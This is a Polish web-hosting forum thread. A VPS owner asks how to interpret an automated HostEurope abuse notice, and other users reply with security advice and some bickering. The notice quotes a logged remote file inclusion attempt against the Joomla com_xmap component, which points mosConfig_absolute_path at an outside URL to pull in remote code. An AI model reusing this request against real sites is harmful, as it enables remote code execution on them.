Skocz do zawartości
Zaloguj się, aby obserwować  
pieto

Strona zhakowana.. - HE VPS

Polecane posty

Witam serdecznie,

 

Dostalem monit od HostEurope o ataku na serwis, nie bardzo rozumiem monit ktory mi przesłali:

 

> Mon Oct 27 09:45:01 CET 2008

>

> I am sorry to have to inform you that access to our server for the host

with the IP-Address 87.230.33.107 has been denied.

>

> The host identified by IP-Address 87.230.33.107 has tried to execute

following action:

>

> -----------------------------------------------------

> 87.230.33.107 - - [27/Oct/2008:09:41:07 +0100] "GET

/index.php?option=com_xmap&Itemid=&mosConfig_absolute_path=http://vobucks.com/spam/bo.do?

HTTP/1.1" 404 18787 "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1)

Gecko/20060918 Firefox/2.0"

> Mon Oct 27 09:42:06 CET 2008 [b++] Blocking permanently 87.230.33.107

[87.230.33.107]. Host seems to be a server. Response: Interesting ports on

lvps87-230-33-107.dedicated.hosteurope.de (87.230.33.107): 22/tcp open ssh 25/tcp

open smtp 80/tcp open http 110/tcp open pop3

> -----------------------------------------------------

>

> This action has been recognized as an hack attempt and access to the

server for this IP-Address has been denied.

>

> See also: http://firewall.sigsiu.net/index.php?ip=87.230.33.107

>

>

> Best Regards,

> Abuse Reporting Script

>

> PS: IMPORTANT: This email has been generated automatically. Remember,

this is just a notification. Please do not reply to this email.

>

> --------------------------------

>

> NOTICE - This e-mail is only intended to be read by the named recipient.

> It may contain information which is confidential, proprietary or the

subject of legal privilege.

> If you are not the intended recipient please notify the sender

immediately and delete this e-mail.

> You may not use any information contained in it.

> Legal privilege is not waived because you have read this e-mail.

>

>

>

 

Jak to powianiem przeanalizować ? co sprawdzić ? i co im odpisać bo mnie straszą że wyłączą VPS! ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

jeśli używasz jakiegoś dziurawego CMSa, to zadbaj o aktualizację. Jednak prawdopodobne jest to, że było to po prostu jakieś dziecko, które próbowalo użyć sploita na twój serwis...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nie powiem o jaką stronę chodzi,

ale jest na własnym CMSie.

 

Ogolnie nie wydaje mi sie aby coś to popsulo na serwerze,

chociaz oni marudzą ze tnie im po łączu..

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Nie zrozum mnie źle, ale jeśli nie rozumiesz maila wysłanego przez HE, śmiem twierdzić iż nie jesteś w kompetencji by stwierdzić czy coś się popsuło. Jednak radziłbym zastosowanie technik bezpieczeństwa aplikacji www, chociaż tych podstawowych.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość normanos
Nie powiem o jaką stronę chodzi,

ale jest na własnym CMSie.

ta, jeżeli Joomle można nazwać własnym :)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Czy te forum 5 letnie dzieci prowadzą ??

 

Rozumiem co do mnie napisał HE,

nie rozumiem, a w zasadzie nie rozumiałem co powoduje wykonanie

/index.php?option=com_xmap&Itemid=&mosConfig_absolute_path=http://vobucks.com/spam/bo.do?

 

Nie wiem tez jakim sposobem (i co mam przez to rozumiec) ze adres został zablokowany

http://firewall.sigsiu.net/index.php?ip=87.230.33.107

 

Nie wiem tez gdzie powinienem szukać podobnych logów na serwerze

i jak sprawdzić czy nie mam lewych procesów.

 

Od strony aplikacji www raczej dobrze jestem zabezpieczony.

 

 

normanos- JESLI PISZE ZE NIE JOOMLA - TO NIE JOOMLA sam pisałem softa.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Czy te forum 5 letnie dzieci prowadzą ??

 

Rozumiem co do mnie napisał HE,

nie rozumiem, a w zasadzie nie rozumiałem co powoduje wykonanie

/index.php?option=com_xmap&Itemid=&mosConfig_absolute_path=http://vobucks.com/spam/bo.do?

 

Nie wiem tez jakim sposobem (i co mam przez to rozumiec) ze adres został zablokowany

http://firewall.sigsiu.net/index.php?ip=87.230.33.107

 

Nie wiem tez gdzie powinienem szukać podobnych logów na serwerze

i jak sprawdzić czy nie mam lewych procesów.

 

Od strony aplikacji www raczej dobrze jestem zabezpieczony.

 

 

normanos- JESLI PISZE ZE NIE JOOMLA - TO NIE JOOMLA sam pisałem softa.

 

A ty masz 5 lat? Jak nie masz o czymś zielonego pojęcia to przenieś się na shared hosting. A tutaj ludzie mogą ale nie muszą Ci pomóć, więc uwagi nie na miejscu zostaw dla siebie:)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Sorry jeśli kogoś uraziłem,

 

Myślałem ze forum jest po to aby pytać

oczekiwałem na konkretne odpowiedzi a nie sprośne obrazki...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×